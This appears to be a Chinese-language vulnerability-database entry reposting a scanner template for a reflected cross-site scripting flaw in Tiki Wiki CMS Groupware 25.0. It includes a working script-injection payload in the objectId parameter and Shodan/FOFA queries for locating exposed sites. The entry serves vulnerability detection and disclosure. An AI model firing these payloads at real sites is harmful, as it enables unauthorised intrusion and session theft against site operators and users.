tikiwiki-xss: Tiki Wiki CMS Groupware v25.0 - Cross Site Scripting

日期: 2025-08-01 | 影响软件: tikiwiki | POC: 已公开

漏洞描述

Tiki Wiki CMS Groupware version 25.0 suffers from a cross site scripting vulnerability.

PoC代码[已公开]

id: tikiwiki-xss

info:
  name: Tiki Wiki CMS Groupware v25.0 - Cross Site Scripting
  author: arafatansari
  severity: medium
  description: |
    Tiki Wiki CMS Groupware version 25.0 suffers from a cross site scripting vulnerability.
  reference:
    - https://packetstormsecurity.com/files/170446/Tiki-Wiki-CMS-Groupware-25.0-Cross-Site-Scripting.html
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.html:"tiki wiki"
    product: tikiwiki_cms\/groupware
    vendor: tiki
    fofa-query: body="tiki wiki"
  tags: edb,xss,tikiwiki,packetstorm,acketstorm,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/tiki/tiki-ajax_services.php?controller=comment&action=list&type=wiki+page&objectId=<script>alert(document.domain)</script>"
      - "{{BaseURL}}/tiki-ajax_services.php?controller=comment&action=list&type=wiki+page&objectId=<script>alert(document.domain)</script>"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>'
          - 'Tiki Wiki CMS'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 403
# digest: 4a0a00473045022100efa2d655c39d0835a4999a61be87d1adc6196aa83ad2da1fb92b36e3b2cf60f00220139f1552d3823e5e74c77bf8800fcd4f73074da3b3352cce1afa2d584a0b739d:922c64590222798bb761d5b6d8e72950

相关漏洞推荐